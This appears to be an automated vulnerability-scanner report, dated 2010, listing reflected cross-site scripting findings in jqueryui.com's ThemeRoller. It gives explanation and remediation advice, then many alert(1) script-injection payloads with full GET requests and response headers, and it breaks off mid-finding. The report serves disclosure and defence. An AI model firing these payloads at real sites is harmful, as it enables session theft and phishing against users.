Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9362f"><script>alert(1)</script>7fddcf07157 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12ef6"><script>alert(1)</script>d355649fe6d was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b213"><script>alert(1)</script>37764a8a11e was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e9c"><script>alert(1)</script>31802c83066 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20197"><script>alert(1)</script>6c15c17f767 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e08a"><script>alert(1)</script>a833aec8e23 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f91"><script>alert(1)</script>76251dd2dbe was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c0c"><script>alert(1)</script>392fcb08d71 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7add9"><script>alert(1)</script>6148fa48b45 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9da"><script>alert(1)</script>86889186ca9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748e"><script>alert(1)</script>247c52aef85 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ba4"><script>alert(1)</script>d9d50feafdb was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15aa"><script>alert(1)</script>ffc4cddc3d9 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
